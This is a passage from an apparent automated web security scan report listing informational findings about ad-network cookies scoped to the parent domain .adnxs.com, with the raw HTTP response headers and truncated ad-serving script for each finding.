acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 21:58:08 GMT
Content-Length: 743

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-85794731_1296251888,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.81. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
acb161789=5_[r^208WMM2x@N!@@-#c5UK9?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP3ReQm0PH-EwBWHfHSmrEEKCcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQELgkBAgUCAAIAAAAATiHU5gAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265346%29%3Buf%28%27r%27%2C+116344%2C+1296265346%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.82. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
acb810948=5_[r^208WMuF4Lw)IE.8.Cw7k?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPzre96IF0ShCBWHfHSmrEELkPkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEYAYBAgUCAAIAAAAAwyH-GwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252644%29%3Buf%28%27r%27%2C+151403%2C+1296252644%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2811%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2887%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28619%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28620%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28621%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb64287=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb810948=5_[r^208WMuF4Lw)IE.8.Cw7k?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPzre96IF0ShCBWHfHSmrEELkPkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEYAYBAgUCAAIAAAAAwyH-GwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252644%29%3Buf%28%27r%27%2C+151403%2C+1296252644%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2811%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2887%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28619%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28620%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28621%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:10:44 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-15295914_1296252644,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.83. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
acb502322=5_[r^208WMuF4Lw)IE.8#`^VR?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP6BgySx3_8JEBWHfHSmrEELJQUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnQMBAgUCAAIAAAAAZSKqQQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253385%29%3Buf%28%27r%27%2C+151403%2C+1296253385%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2811%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2887%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28619%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28620%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28621%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb322141=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb502322=5_[r^208WMuF4Lw)IE.8#`^VR?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP6BgySx3_8JEBWHfHSmrEELJQUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnQMBAgUCAAIAAAAAZSKqQQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253385%29%3Buf%28%27r%27%2C+151403%2C+1296253385%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2811%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2887%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28619%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28620%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28621%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:23:05 GMT
Content-Length: 833

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-61892947_1296253385,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.84. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
acb152162=5_[r^208WMM2x@N!@@-#bq9B8?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP9B6FowdZ9lbBWHfHSmrEEKBcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQELQkBAgUCAAIAAAAAMCIpMgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265345%29%3Buf%28%27r%27%2C+116344%2C+1296265345%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.85. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
acb458625=5_[r^208WMuF4Lw)IE.8*M4Bc?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8BW6sqWS4UpBWHfHSmrEELbP0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAUyJEQAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252891%29%3Buf%28%27r%27%2C+151403%2C+1296252891%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2811%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2887%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28619%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28620%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28621%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb810948=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
